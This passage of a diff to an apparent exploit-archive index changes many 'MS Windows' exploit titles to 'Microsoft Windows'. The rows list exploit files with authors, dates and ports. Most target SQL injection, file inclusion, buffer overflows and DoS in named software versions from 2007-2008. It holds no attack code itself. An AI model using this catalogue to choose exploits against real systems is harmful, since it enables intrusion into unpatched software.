(login.php table) Local File Inclusion Vulnerability",2007-03-30,GoLd_M,php,webapps,0 3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)",2007-03-30,mu-b,linux,remote,53 3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143 -3617,platforms/windows/local/3617.cpp,"MS Windows Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0 +3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 3620,platforms/php/webapps/3620.pl,"XOOPS Module Core (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 @@ -3292,9 +3292,9 @@ id,file,description,date,author,platform,type,port 3631,platforms/php/webapps/3631.txt,"Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability",2007-04-01,Dj7xpl,php,webapps,0 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P <= 2.0 (cid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3634,platforms/windows/remote/3634.txt,"MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit",2007-04-01,jamikazu,windows,remote,0 -3635,platforms/windows/remote/3635.txt,"MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2",2007-04-01,"Trirat Puttaraksa",windows,remote,0 -3636,platforms/windows/remote/3636.txt,"MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass)",2007-04-01,jamikazu,windows,remote,0 +3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor (.ANI) Remote Overflow Exploit",2007-04-01,jamikazu,windows,remote,0 +3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2",2007-04-01,"Trirat Puttaraksa",windows,remote,0 +3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor (.ANI) Remote Exploit (eeye patch bypass)",2007-04-01,jamikazu,windows,remote,0 3638,platforms/php/webapps/3638.txt,"maplab ms4w 2.2.1 - Remote File Inclusion Vulnerability",2007-04-02,ka0x,php,webapps,0 3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 (cid) Remote SQL Injection Vulnerability",2007-04-02,"Mehmet Ince",php,webapps,0 3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 (cid) Remote SQL Injection Vulnerability",2007-04-02,"Mehmet Ince",php,webapps,0 @@ -3302,12 +3302,12 @@ id,file,description,date,author,platform,type,port 3644,platforms/php/webapps/3644.pl,"XOOPS Module WF-Section <= 1.01 (articleid) SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 -3647,platforms/windows/local/3647.c,"MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 +3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3648,platforms/windows/local/3648.c,"IrfanView 3.99 (.ANI File) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3650,platforms/windows/remote/3650.c,"Frontbase <= 4.2.7 - POST-AUTH Remote Buffer Overflow Exploit (2.2)",2007-04-02,Heretic2,windows,remote,0 -3651,platforms/windows/remote/3651.txt,"MS Windows Animated Cursor (.ANI) Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 -3652,platforms/windows/local/3652.c,"MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)",2007-04-03,devcode,windows,local,0 +3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor (.ANI) Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 +3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)",2007-04-03,devcode,windows,local,0 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) <= 1.2.3 - Remote Code Execution Exploit",2007-04-03,DarkFig,php,webapps,0 3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 SQL Execution Exploit",2007-04-03,"Isma Khan",multiple,remote,0 3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit",2007-04-03,ajann,php,webapps,0 @@ -3338,18 +3338,18 @@ id,file,description,date,author,platform,type,port 3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)",2007-04-07,axis,windows,remote,80 3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit",2007-04-08,bd0rk,php,webapps,0 -3684,platforms/windows/dos/3684.c,"MS Windows Explorer Unspecified .ANI File Denial of Service Exploit",2007-04-08,Marsu,windows,dos,0 +3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Exploit",2007-04-08,Marsu,windows,dos,0 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability",2007-04-08,the_Edit0r,php,webapps,0 3686,platforms/php/webapps/3686.txt,"WitShare 0.9 (index.php menu) Local File Inclusion Vulnerability",2007-04-08,the_Edit0r,php,webapps,0 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0 -3688,platforms/windows/local/3688.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0 +3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0 3690,platforms/windows/dos/3690.txt,"microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0 3692,platforms/windows/local/3692.c,"IrfanView 3.99 .ANI File Local Buffer Overflow Exploit (multiple targets)",2007-04-09,"Breno Silva Pinto",windows,local,0 -3693,platforms/windows/dos/3693.txt,"MS Windows .HLP File Local HEAP Overflow PoC 0day",2007-04-09,muts,windows,dos,0 +3693,platforms/windows/dos/3693.txt,"Microsoft Windows - .HLP File Local HEAP Overflow PoC (0day)",2007-04-09,muts,windows,dos,0 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion Vulnerability",2007-04-09,Dj7xpl,php,webapps,0 -3695,platforms/windows/local/3695.c,"MS Windows Animated Cursor (.ANI) Local Overflow Exploit",2007-04-09,"Breno Silva Pinto",windows,local,0 +3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor (.ANI) Local Overflow Exploit",2007-04-09,"Breno Silva Pinto",windows,local,0 3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 (warn.php file) Remote File Inclusion Vulnerability",2007-04-09,kezzap66345,php,webapps,0 3697,platforms/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution Vulnerability",2007-04-10,Dj7xpl,php,webapps,0 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability",2007-04-10,c0ntex,linux,remote,0 @@ -3390,10 +3390,10 @@ id,file,description,date,author,platform,type,port 3734,platforms/php/webapps/3734.txt,"joomla module autostand 1.0 - Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution Vulnerability",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"mambo/joomla component article 1.1 - Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 -3737,platforms/windows/remote/3737.py,"MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)",2007-04-15,"Winny Thomas",windows,remote,139 +3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow Exploit",2007-04-15,"Winny Thomas",windows,remote,139 3738,platforms/windows/remote/3738.php,"XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit",2007-04-15,rgod,windows,remote,80 3739,platforms/php/webapps/3739.php,"Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit",2007-04-15,Kacper,php,webapps,0 -3740,platforms/windows/remote/3740.c,"MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit",2007-04-15,devcode,windows,remote,139 +3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow Exploit",2007-04-15,devcode,windows,remote,139 3741,platforms/php/webapps/3741.txt,"CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability",2007-04-15,irvian,php,webapps,0 3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit",2007-04-15,BeyazKurt,php,webapps,0 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 @@ -3408,7 +3408,7 @@ id,file,description,date,author,platform,type,port 3752,platforms/php/webapps/3752.txt,"AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities",2007-04-17,"Alkomandoz Hacker",php,webapps,0 3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI",2007-04-17,"Cold Zero",php,webapps,0 3754,platforms/php/webapps/3754.pl,"MiniGal b13 (image backdoor) Remote Code Execution Exploit",2007-04-17,Dj7xpl,php,webapps,0 -3755,platforms/windows/local/3755.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 +3755,platforms/windows/local/3755.c,"Microsoft Windows GDI - Local Privilege Escalation Exploit (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full Remote File Inclusion Vulnerability",2007-04-17,Dj7xpl,php,webapps,0 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 Local Format String Exploit",2007-04-17,jamikazu,windows,local,0 3758,platforms/php/webapps/3758.php,"ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit",2007-04-17,Gammarays,php,webapps,0 @@ -3457,7 +3457,7 @@ id,file,description,date,author,platform,type,port 3801,platforms/windows/local/3801.c,"Gimp 2.2.14 .RAS File SUNRAS Plugin Buffer Overflow Exploit",2007-04-26,Marsu,windows,local,0 3802,platforms/php/webapps/3802.txt,"phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability",2007-04-26,koray,php,webapps,0 3803,platforms/php/webapps/3803.txt,"phpOracleView (include_all.inc.php page_dir) RFI Vulnerability",2007-04-26,"Alkomandoz Hacker",php,webapps,0 -3804,platforms/windows/remote/3804.txt,"MS Windows - (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0 +3804,platforms/windows/remote/3804.txt,"Microsoft Windows - (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0 3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 (doc_root) Remote File Inclusion Vulnerabilities",2007-04-26,"Alkomandoz Hacker",php,webapps,0 3806,platforms/php/webapps/3806.txt,"EsForum 3.0 (forum.php idsalon) Remote SQL Injection Vulnerability",2007-04-26,"ilker Kandemir",php,webapps,0 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow PoC",2007-04-27,mu-b,linux,dos,0 @@ -3577,7 +3577,7 @@ id,file,description,date,author,platform,type,port 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog <= 1.4.8a Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0 3925,platforms/windows/remote/3925.py,"TinyIdentD <= 2.2 - Remote Buffer Overflow Exploit",2007-05-14,"Thomas Pollet",windows,remote,113 -3926,platforms/windows/dos/3926.py,"MS Windows Vista - Forged ARP packet Network Stack DoS Exploit",2007-05-15,"Kristian Hermansen",windows,dos,0 +3926,platforms/windows/dos/3926.py,"Microsoft Windows Vista - Forged ARP packet Network Stack DoS Exploit",2007-05-15,"Kristian Hermansen",windows,dos,0 3927,platforms/windows/remote/3927.html,"DeWizardX (DEWizardAX.ocx) Arbitrary File Overwrite Exploit",2007-05-15,shinnai,windows,remote,0 3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion Vulnerability",2007-05-15,Katatafish,php,webapps,0 3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 @@ -3694,7 +3694,7 @@ id,file,description,date,author,platform,type,port 4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit",2007-06-07,GoLd_M,php,webapps,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit",2007-06-07,Excepti0n,windows,remote,0 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2",2007-06-07,Excepti0n,windows,remote,0 -4044,platforms/windows/dos/4044.txt,"MS Windows GDI+ ICO File - Remote Denial of Service Exploit",2007-06-07,Kad,windows,dos,0 +4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service Exploit",2007-06-07,Kad,windows,dos,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows Animated Cursor Stack Overflow Exploit",2007-06-07,"RISE Security",windows,remote,0 4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x Remote Denial of Service Exploit",2007-06-07,gbr,windows,dos,0 4047,platforms/windows/dos/4047.c,"SafeNET High Assurance Remote 1.4.0 (IPSecDrv.sys) Remote DoS",2007-06-08,mu-b,windows,dos,0 @@ -3859,7 +3859,7 @@ id,file,description,date,author,platform,type,port 4212,platforms/php/webapps/4212.txt,"Joomla! CMS 1.5 beta 2 (search) Remote Code Execution Vulnerability",2007-07-22,"Johannes Greil",php,webapps,0 4213,platforms/php/webapps/4213.txt,"bwired (index.php newsID) Remote SQL Injection Vulnerability",2007-07-22,g00ns,php,webapps,0 4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote BoF",2007-07-23,shinnai,windows,remote,0 -4215,platforms/windows/dos/4215.pl,"MS Windows Explorer.exe Gif Image Denial of Service Exploit",2007-07-23,DeltahackingTEAM,windows,dos,0 +4215,platforms/windows/dos/4215.pl,"Microsoft Windows - Explorer.exe Gif Image Denial of Service Exploit",2007-07-23,DeltahackingTEAM,windows,dos,0 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha Post Request Remote Buffer Overflow Exploit",2007-07-23,deusconstruct,linux,dos,0 4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 Remote Buffer Overflow Exploit",2007-07-24,"Jared DeMott",windows,remote,0 4218,platforms/windows/local/4218.php,"PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 @@ -3981,7 +3981,7 @@ id,file,description,date,author,platform,type,port 4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0 4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0 4336,platforms/php/webapps/4336.txt,"xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability",2007-08-29,DarkFuneral,php,webapps,0 -4337,platforms/windows/dos/4337.c,"MS Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 +4337,platforms/windows/dos/4337.c,"Microsoft Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit",2007-08-29,k1tk4t,php,webapps,0 4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 (shownews.php id) Remote SQL Injection Vulnerability",2007-08-29,SmOk3,php,webapps,0 4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities",2007-08-29,GoLd_M,php,webapps,0 @@ -4387,7 +4387,7 @@ id,file,description,date,author,platform,type,port 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC",2007-12-18,r4x,windows,dos,0 4743,platforms/php/webapps/4743.pl,"FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device (Goahead WEBSERVER) Disclosure Vulnerability",2007-12-18,NeoCoderz,hardware,remote,0 -4745,platforms/windows/remote/4745.cpp,"MS Windows Message Queuing Service - RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0 +4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC BOF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0 4746,platforms/windows/remote/4746.html,"RavWare Software MAS Flic Control Remote Buffer Overflow Exploit",2007-12-18,shinnai,windows,remote,0 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0 4748,platforms/windows/dos/4748.php,"SurgeMail v.38k4 webmail Host header Denial of Service Exploit",2007-12-18,rgod,windows,dos,0 @@ -4401,7 +4401,7 @@ id,file,description,date,author,platform,type,port 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability",2007-12-19,p4imi0,php,webapps,0 4759,platforms/osx/local/4759.c,"Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit",2007-12-19,"Subreption LLC.",osx,local,0 -4760,platforms/windows/remote/4760.txt,"MS Windows 2000 AS SP4 - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 +4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25 4762,platforms/php/webapps/4762.txt,"nicLOR CMS (sezione_news.php) Remote SQL Injection Vulnerability",2007-12-21,x0kster,php,webapps,0 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 (output) Remote File Inclusion Vulnerability",2007-12-21,CraCkEr,php,webapps,0 @@ -4573,7 +4573,7 @@ id,file,description,date,author,platform,type,port 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 (Enterprise Tree Control) ActiveX BOF/DoS",2008-01-17,shinnai,windows,dos,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications (RtspVaPgCtrl) Remote BOF Exploit",2008-01-17,rgod,windows,remote,0 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 (stat.php) Remote Code Execution Exploit",2008-01-18,k1tk4t,php,webapps,0 -4934,platforms/windows/remote/4934.c,"MS Windows Message Queuing Service RPC BOF Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 +4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service RPC BOF Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 rtlabel_id2name() Local Null Pointer Dereference DoS",2008-01-18,Hunger,bsd,dos,0 4936,platforms/php/webapps/4936.txt,"Gradman <= 0.1.3 (info.php tabla) Local File Inclusion Vulnerability",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 (linkbar.php cfile) Remote File Inclusion Vulnerability",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 @@ -4958,7 +4958,7 @@ id,file,description,date,author,platform,type,port 5324,platforms/php/webapps/5324.txt,"KISGB <= (tmp_theme) 5.1.1 - Local File Inclusion Vulnerability",2008-03-30,Cr@zy_King,php,webapps,0 5325,platforms/php/webapps/5325.txt,"JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability",2008-03-30,v0l4arrra,php,webapps,0 5326,platforms/php/webapps/5326.txt,"Wordpress Plugin Download (dl_id) SQL Injection Vulnerability",2008-03-31,BL4CK,php,webapps,0 -5327,platforms/windows/dos/5327.txt,"MS Windows Explorer Unspecified .DOC File Denial of Service Exploit",2008-03-31,"Iron Team",windows,dos,0 +5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .DOC File Denial of Service Exploit",2008-03-31,"Iron Team",windows,dos,0 5328,platforms/php/webapps/5328.txt,"phpSpamManager 0.53b (body.php) Remote File Disclosure Vulnerability",2008-03-31,GoLd_M,php,webapps,0 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability",2008-03-31,N/A,php,webapps,0 5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)",2008-03-31,Heretic2,windows,remote,80 @@ -5072,7 +5072,7 @@ id,file,description,date,author,platform,type,port 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling Vulnerability",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS Remote SQL Injection Vulnerability",2008-04-14,cO2,php,webapps,0 -5442,platforms/windows/local/5442.cpp,"MS Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0 +5442,platforms/windows/local/5442.cpp,"Microsoft Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0 5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) Remote SQL Injection Vulnerability",2008-04-14,Stack,php,webapps,0 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability",2008-04-14,"SoSo H H",php,webapps,0 5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow Exploit",2008-04-14,Heretic2,windows,remote,2954 @@ -5148,7 +5148,7 @@ id,file,description,date,author,platform,type,port 5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0 -5518,platforms/windows/local/5518.txt,"MS Windows XP SP2 - (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0 +5518,platforms/windows/local/5518.txt,"Microsoft Windows XP SP2 - (win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability",2008-04-28,HaCkeR_EgY,php,webapps,0 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability",2008-04-29,"Roberto Suggi Liverani",php,webapps,0 @@ -6036,7 +6036,7 @@ id,file,description,date,author,platform,type,port 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite Remote SQL Injection Vulnerabilities",2008-09-14,~!Dok_tOR!~,php,webapps,0 6461,platforms/php/webapps/6461.txt,"Cpanel <= 11.x (Fantastico) LFI Vulnerability (sec bypass)",2008-09-14,joker_1,php,webapps,0 6462,platforms/php/webapps/6462.pl,"CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit",2008-09-15,StAkeR,php,webapps,0 -6463,platforms/windows/dos/6463.rb,"MS Windows WRITE_ANDX SMB command handling Kernel DoS (meta)",2008-09-15,"Javier Vicente Vallejo",windows,dos,0 +6463,platforms/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel DoS (meta)",2008-09-15,"Javier Vicente Vallejo",windows,dos,0 6464,platforms/php/webapps/6464.txt,"CzarNews <= 1.20 (Account Hijacking) Remote SQL Injection Vuln",2008-09-15,0ut0fbound,php,webapps,0 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings (search.php c) SQL Injection Vulnerability",2008-09-15,JosS,php,webapps,0 6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple Remote SQL Injection Vulnerabilities",2008-09-15,SirGod,php,webapps,0 @@ -6130,7 +6130,7 @@ id,file,description,date,author,platform,type,port 6557,platforms/php/webapps/6557.txt,"ADN Forum <= 1.0b Insecure Cookie Handling Vulnerability",2008-09-24,Pepelux,php,webapps,0 6558,platforms/php/webapps/6558.txt,"barcodegen <= 2.0.0 - Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0 -6560,platforms/windows/dos/6560.txt,"MS Windows Wordpad .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0 +6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0 6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection Vulnerability",2008-09-25,InjEctOr5,php,webapps,0 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 (design) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 6563,platforms/php/webapps/6563.txt,"phpOCS <= 0.1-beta3 (index.php act) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 @@ -6158,7 +6158,7 @@ id,file,description,date,author,platform,type,port 6585,platforms/php/webapps/6585.txt,"openengine 2.0 beta2 - Remote File Inclusion Vulnerability",2008-09-26,Crackers_Child,php,webapps,0 6586,platforms/php/webapps/6586.txt,"Crux Gallery <= 1.32 Insecure Cookie Handling Vulnerability",2008-09-26,Pepelux,php,webapps,0 6587,platforms/php/webapps/6587.txt,"The Gemini Portal (lang) Remote File Inclusion Vulnerabilities",2008-09-26,ZoRLu,php,webapps,0 -6588,platforms/windows/dos/6588.txt,"MS Windows GDI+ (.ico File) Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 +6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - (.ico File) Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 6589,platforms/php/webapps/6589.txt,"RPG.Board <= 0.0.8Beta2 (showtopic) SQL Injection Vulnerability",2008-09-26,0x90,php,webapps,0 6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability",2008-09-27,Crackers_Child,php,webapps,0 6591,platforms/php/webapps/6591.txt,"RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling 